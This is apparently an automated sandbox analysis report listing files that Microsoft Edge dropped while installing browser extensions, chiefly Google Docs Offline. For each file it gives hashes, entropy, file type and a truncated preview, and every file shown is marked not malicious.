                                                                                                                                                                                                                                                                                      MD5:0E60627ACFD18F44D4DF469D8DCE6D30
                                                                                                                                                                                                                                                                                      SHA1:2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
                                                                                                                                                                                                                                                                                      SHA-256:F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
                                                                                                                                                                                                                                                                                      SHA-512:6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\zu\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):912
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.65963951143349
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
                                                                                                                                                                                                                                                                                      MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                                                                                                                                                                                                                                                                      SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                                                                                                                                                                                                                                                                      SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                                                                                                                                                                                                                                                                      SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_metadata\verified_contents.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):11406
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.745845607168024
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuH+svyw6r+cgTSJJT4LGkt:m8IEI4u8/EgG4
                                                                                                                                                                                                                                                                                      MD5:0A68C9539A188B8BB4F9573F2F2321D6
                                                                                                                                                                                                                                                                                      SHA1:E0F814FA4DCC04EDC6A5D39CBC1038979E88F0E5
                                                                                                                                                                                                                                                                                      SHA-256:39E6C25D096AFD156644F07586D85E37F1F7B3DA9B636471E8D15CEB14DB184F
                                                                                                                                                                                                                                                                                      SHA-512:13F133C173C6622B8E1B6F86A551CBC5B0B2446B3CF96E4AE8CA2646009B99E4A360C2DB3168CB94A488FAEBD215003DFA60D10150B7A85B5F8919900BD01CCC
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiIxMjgucG5nIiwicm9vdF9oYXNoIjoiZ2NWZy0xWWgySktRNVFtUmtjZGNmamU1dzVIc1JNN1ZCTmJyaHJ4eGZ5ZyJ9LHsicGF0aCI6Il9sb2NhbGVzL2FmL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJxaElnV3hDSFVNLWZvSmVFWWFiWWlCNU9nTm9ncUViWUpOcEFhZG5KR0VjIn0seyJwYXRoIjoiX2xvY2FsZXMvYW0vbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IlpPQWJ3cEs2THFGcGxYYjh4RVUyY0VkU0R1aVY0cERNN2lEQ1RKTTIyTzgifSx7InBhdGgiOiJfbG9jYWxlcy9hci9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiUjJVaEZjdTVFcEJfUUZtU19QeGstWWRrSVZqd3l6WEoxdURVZEMyRE9BSSJ9LHsicGF0aCI6Il9sb2NhbGVzL2F6L21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJZVVJ3Mmp4UU5Lem1TZkY0YS1xcTBzbFBSSFc4eUlXRGtMY2g4Ry0zdjJRIn0seyJwYXRoIjoiX2xvY2FsZXMvYmUvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IjNmRm9XYUZmUHJNelRXSkJsMXlqbUlyRDZ2dzlsa1VxdzZTdjAyUk1oVkEifSx7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiSXJ3M3RIem9xREx6bHdGa0hjTllOWFoyNmI0WWVwT2t4ZFN

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\dasherSettingSchema.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):854
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.284628987131403
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
                                                                                                                                                                                                                                                                                      MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                                                                                                                                                                                                                                                                      SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                                                                                                                                                                                                                                                                      SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                                                                                                                                                                                                                                                                      SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\manifest.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2525
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.417954053901
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj17x9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/AP7xgiVb
                                                                                                                                                                                                                                                                                      MD5:5E425DC36364927B1348F6C48B68C948
                                                                                                                                                                                                                                                                                      SHA1:9E411B88453DEF3F7CFCB3EAA543C69AD832B82F
                                                                                                                                                                                                                                                                                      SHA-256:32D9C8DE71A40D71FC61AD52AA07E809D07DF57A2F4F7855E8FC300F87FFC642
                                                                                                                                                                                                                                                                                      SHA-512:C19217B9AF82C1EE1015D4DFC4234A5CE0A4E482430455ABAAFAE3F9C8AE0F7E5D2ED7727502760F1B0656F0A079CB23B132188AE425E001802738A91D8C5D79
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\offscreendocument.html

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):97
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.862433271815736
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
                                                                                                                                                                                                                                                                                      MD5:B747B5922A0BC74BBF0A9BC59DF7685F
                                                                                                                                                                                                                                                                                      SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
                                                                                                                                                                                                                                                                                      SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
                                                                                                                                                                                                                                                                                      SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\offscreendocument_main.js

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):122218
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.439997574414675
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:1536:naCwKqAbNBbV9HGsR43l9S6w3xu7gXMgaG0R6RxNbF4Ki3wqP+PrQY2PEtb1B:Jfcs1XMr2zbF4Ki+PkPEfB
                                                                                                                                                                                                                                                                                      MD5:67C4451398037DD1C497A1EA98227630
                                                                                                                                                                                                                                                                                      SHA1:F5BB00D46BCAB5A8A02E68E4895AEB6859B74AA8
                                                                                                                                                                                                                                                                                      SHA-256:59123D5A34A319791E90391FC55F0F4B8F5ABB6DB67353609DB25ACC3E99C166
                                                                                                                                                                                                                                                                                      SHA-512:17F35CE2A11C26168CC52C4AE2BEC548A1AEB1B1F9CB3475B0552BDE71CFE94C5C0C4F3F51267EF7C7D9B0E01E1D1259F48968E70EE1E905471BA0C76ECA81EA
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var ha=ea(this);function r(a,b){if(b)a:{var c=ha;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\page_embed_script.js

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):291
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.65176400421739
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
                                                                                                                                                                                                                                                                                      MD5:3AB0CD0F493B1B185B42AD38AE2DD572
                                                                                                                                                                                                                                                                                      SHA1:079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
                                                                                                                                                                                                                                                                                      SHA-256:73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
                                                                                                                                                                                                                                                                                      SHA-512:32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\service_worker_bin_prod.js

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):130866
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.425065147784983
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:1536:zKjBw7l0GLFqjLmqoTquyBQCGLu5fJDX5pwPGFSS2IH0dKxQ5SbNyO+DrxZlkaY8:XYQi3DX5WkfH0dKxdboDrNOdor
                                                                                                                                                                                                                                                                                      MD5:1A8A1F4E5BA291867D4FA8EF94243EFA
                                                                                                                                                                                                                                                                                      SHA1:B25076D2AE85BD5E4ABA935F758D5122CCB82C36
                                                                                                                                                                                                                                                                                      SHA-256:441385D13C00F82ABEEDD56EC9A7B2FE90658C9AACB7824DEA47BB46440C335B
                                                                                                                                                                                                                                                                                      SHA-512:F05668098B11C60D0DDC3555FCB51C3868BB07BA20597358EBA3FEED91E59F122E07ECB0BD06743461DFFF8981E3E75A53217713ABF2A78FB4F955641F63537C
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var fa=ea(this);function r(a,b){if(b)a:{var c=fa;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_460563952\47106046-6560-4766-9ef3-ce200edfce8b.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):11185
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                      MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                      SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                      SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                      SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_460563952\CRX_INSTALL\_metadata\verified_contents.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1753
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.8889033066924155
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                                                                                                                                                                                                                                                                      MD5:738E757B92939B24CDBBD0EFC2601315
                                                                                                                                                                                                                                                                                      SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                                                                                                                                                                                                                                                                      SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                                                                                                                                                                                                                                                                      SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "eyJpdGVtX2lkIjoiam1qZmxnanBjcGVwZWFmbW1nZHBma29na2doY3BpaGEiLCJpdGVtX3ZlcnNpb24iOiIxLjIuMSIsInByb3RvY29sX3ZlcnNpb24iOjEsImNvbnRlbnRfaGFzaGVzIjpbeyJmb3JtYXQiOiJ0cmVlaGFzaCIsImRpZ2VzdCI6InNoYTI1NiIsImJsb2NrX3NpemUiOjQwOTYsImhhc2hfYmxvY2tfc2l6ZSI6NDA5NiwiZmlsZXMiOlt7InBhdGgiOiJjb250ZW50LmpzIiwicm9vdF9oYXNoIjoiQS13R1JtV0VpM1lybmxQNktneUdrVWJ5Q0FoTG9JZnRRZGtHUnBEcnp1QSJ9LHsicGF0aCI6ImNvbnRlbnRfbmV3LmpzIiwicm9vdF9oYXNoIjoiVU00WVRBMHc5NFlqSHVzVVJaVTFlU2FBSjFXVENKcHhHQUtXMGxhcDIzUSJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJKNXYwVTkwRmN0ejBveWJMZmZuNm5TbHFLU0h2bHF2YkdWYW9FeWFOZU1zIn1dfV19",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_460563952\CRX_INSTALL\content.js

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):9815
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.1716321262973315
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
                                                                                                                                                                                                                                                                                      MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                                                                                                                                                                                                                                                                      SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                                                                                                                                                                                                                                                                      SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
                                                                                                                                                                                                                                                                                      SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_460563952\CRX_INSTALL\content_new.js

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):10388
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.174387413738973
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                                                                                                                                                                                                                                                                      MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                                                                                                                                                                                                                                                                      SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                                                                                                                                                                                                                                                                      SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                                                                                                                                                                                                                                                                      SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_460563952\CRX_INSTALL\manifest.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
